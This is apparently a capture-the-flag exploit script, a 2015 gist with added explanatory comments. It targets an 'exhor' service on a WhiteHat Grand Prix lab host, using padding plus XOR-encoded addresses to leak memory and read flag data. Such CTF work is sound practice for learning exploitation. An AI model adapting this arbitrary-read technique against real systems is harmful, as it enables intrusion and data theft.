@peternguyen93
Created October 28, 2015 02:48
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
from capstone import *
# Target service for this lab; the single connection object is shared by
# the helpers below (module-level state, as in the original).
HOST = 'lab8.grandprix.whitehatvn.com'
PORT = 1337
p = Pwn(host=HOST, port=PORT)
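def xor(msg, key=0xc3):
    """Return ``msg`` with every character XORed against ``key``.

    This mirrors the per-byte transform the exhor service applies to its
    input (0xc3 per byte, i.e. 0xc3c3c3c3 over a 4-byte dword, which is the
    mask used on the addresses sent in exploit()). Because XOR is its own
    inverse, pre-XORing a value cancels the server-side XOR, and
    ``xor(xor(s)) == s``.

    Args:
        msg: str whose characters are treated as single bytes (ord < 256).
        key: single-byte key; defaults to the service's 0xc3.

    Returns:
        A str of the same length as ``msg`` (empty input gives '').
    """
    # join() instead of repeated += so long payloads are not quadratic.
    return ''.join(chr(ord(c) ^ key) for c in msg)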
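_XOR_KEY32 = 0xc3c3c3c3    # 0xc3 repeated over one 32-bit dword (see xor())
_PAD_LEN = 256 + 0xc + 8   # bytes sent before the dword we control; the
                           # split (256-byte buffer + 0xc + 8) is taken from
                           # the original and presumably reflects the
                           # target's stack/struct layout -- not visible here
_PTR_SLOT = 0x0804A01C     # fixed address read first; looks like a .data/.got
                           # slot of a non-PIE 32-bit binary (assumption)
_FLAG_OFFSET = 7156        # distance from the leaked pointer to the second
                           # read; copied from the original, origin unknown


def _read_at(addr):
    """Issue one request whose controlled dword decodes to ``addr``.

    The service XORs every input byte with 0xc3, so ``addr`` is pre-XORed
    with 0xc3c3c3c3 to land unchanged in memory. The reply, as the original
    slices it, appears to echo the padding and the dword and then carry the
    bytes found at ``addr`` (a string-style leak: it presumably stops at the
    first NUL). The trailing '\\x00\\n' is kept from the original; which of
    the two terminates the server-side copy is not visible here.

    Returns the raw reply (at most 1024 bytes). NOTE(review): a single recv()
    may deliver only part of the reply; the original makes the same
    assumption, so callers must check the length before slicing.
    """
    p.send('A' * _PAD_LEN + p.pack(addr ^ _XOR_KEY32) + '\x00\n')
    return p.recv(1024)


def exploit():
    """Two-stage arbitrary read against the exhor service.

    1. Read the dword stored at _PTR_SLOT; the original treats it as the
       address of ``make_flag`` in the target.
    2. Read at ``make_flag + _FLAG_OFFSET`` and print the raw reply, which
       is where the original expected the flag-related data to show up.

    Uses the module-level connection ``p``. Returns None.

    Raises:
        ValueError: the first reply is too short to contain a full 4-byte
            pointer (e.g. a NUL inside the pointer cut the leak short). The
            original unpacked the slice unchecked, which would either raise
            from p.unpack or silently compute a bogus second address.
    """
    p.connect()
    p.read_until('Welcome to exhor server\n')
    # To attach a debugger before the first write, pause here with
    # raw_input('Debug>') as the original did.

    reply = _read_at(_PTR_SLOT)
    leak = reply[_PAD_LEN + 4:_PAD_LEN + 8]
    if len(leak) != 4:
        raise ValueError('leak at 0x%08x returned %d byte(s), expected 4: %r'
                         % (_PTR_SLOT, len(leak), reply))
    make_flag = p.unpack(leak)

    reply = _read_at(make_flag + _FLAG_OFFSET)
    print(repr(reply))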
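# Entry guard so importing this module (e.g. to reuse xor()) does not fire
# the exploit against the remote host.
if __name__ == '__main__':
    exploit()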